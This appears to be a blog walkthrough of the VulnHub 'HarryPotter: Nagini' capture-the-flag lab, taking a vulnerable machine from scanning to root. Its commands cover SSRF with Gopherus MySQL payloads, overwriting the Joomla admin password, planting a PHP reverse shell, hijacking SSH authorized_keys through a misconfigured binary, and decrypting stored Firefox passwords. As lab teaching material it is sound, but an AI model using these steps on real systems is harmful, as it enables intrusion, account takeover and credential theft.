VulnHub: HarryPotter: Nagini
Today we will take a look at Vulnhub: Nagini. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open — open 192.168.0.110
Command: gobuster dir -u http://192.168.0.110 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
We found an directory here: note.txt
I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.
Here we see the word http3, let’s research.
GitHub - cloudflare/quiche: 🥧 Savoury implementation of the QUIC transport protocol and HTTP/3
quiche is an implementation of the QUIC transport protocol and HTTP/3 as specified by the IETF. It provides a low level…
Let’s download and setup.
Command: git clone — recursive https://github.com/cloudflare/quiche
Command: cargo build — examples
Command: cd target/debug/examples
Command: ./http3-client https://192.168.0.110/
I am having two announcements that I need to share with you:
1. We no longer require functionality at /internalResourceFeTcher.php in our main production servers.So I will be removing the same by this week.
2. All developers are requested not to put any configuration’s backup file (.bak) in main production servers as they are readable by every one.
When we look at the /internalResourceFeTcher.php extension, we see a button. When I thought it was a command injection, it didn’t work. I doubted it was ssrf. For this I wrote 127.0.0.1 and the result:
We also found the /joomla extension. The .bak file can be found here. Let’s check
Command: joomscan -u http://192.168.0.110/joomla/
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.9.25
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.0.110/joomla/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.0.110/joomla/robots.txt
Interesting path found from robots.txt
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config file is found
config file path : http://192.168.0.110/joomla/configuration.php.bak
Let’s download the .bak file and look at its contents.
The part we need:
public $dbtype = ‘mysqli’;
public $host = ‘localhost’;
public $user = ‘goblin’;
public $password = ‘’;
public $db = ‘joomla’;
public $dbprefix = ‘joomla_’;
We found ssrf here. Now we have a database. We will use this vulnerability to view and make changes to the database data.
Therefore, we will use this tool
GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in…
If you know a place which is SSRF vulnerable then, this tool will help you to generate Gopher payload for exploiting…
Command: git clone https://github.com/tarunkant/Gopherus.git
Command: python2 gopherus.py — exploit mysql
Let’s enter the data.
We get it after pasting it on the button.
Now we will get more detailed information.
I tried to crack hash here. But i can’t. Therefore, I will check the update.
Command: use joomla;update joomla_users set password=’5f4dcc3b5aa765d61d8327deb882cf99'where username=’site_admin’
Here is the password changed. Let’s log in as an administrator.
Get reverse shell
Extensions — >Templates — >Protostar — > New File
php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell
You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…
Change your ip address and get a paste. Then go to this directory.
Command: script /dev/null -c bash
Command: export TERM=xterm
Command: cd /home/snape
Command: cat .creds.txt
Decode with Base64
Command: su snape
Command: ssh-keygen -f hermoine
Command: python3 -m http.server 80
Command: cd /home/snape/
Command: wget http://192.168.0.107/hermoine.pub
Command: mv hermoine.pub authorized_keys
Command: chmod 640 authorized_keys
Command: cd /home/hermoine/bin/
Command: ./su_cp -p -r /home/snape/authorized_keys /home/hermoine/.ssh/
Command: ssh firstname.lastname@example.org -i hermoine
There was a .mozilla folder in the Hermione folder. When I looked inside the folders, I was confronted with such information.
command: cd /home/hermoine/.mozilla/firefox/g2mhbq0o.default
How to crack Firefox passwords with Python?
Do you think it is safe to store your password in Firefox? The short answer is “no”. Any perpetrator that has access to…
I need to transfer these two files to my local machine to crack the passwords.
Command: python3 -m http.server
I will use this tool to break it.
GitHub - lclevy/firepwd: firepwd.py, an open source tool to decrypt Mozilla protected passwords
18apr2020 This educational tool was written to illustrate how Mozilla passwords (Firefox, Thunderbird) are protected…
Command: git clone https://github.com/lclevy/firepwd/
Command: sudo pip install -r requirements.txt
After uploading two files from the target machine, start the tool.
Command: python firepwd.py
Here we found the root password
Command: su root
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”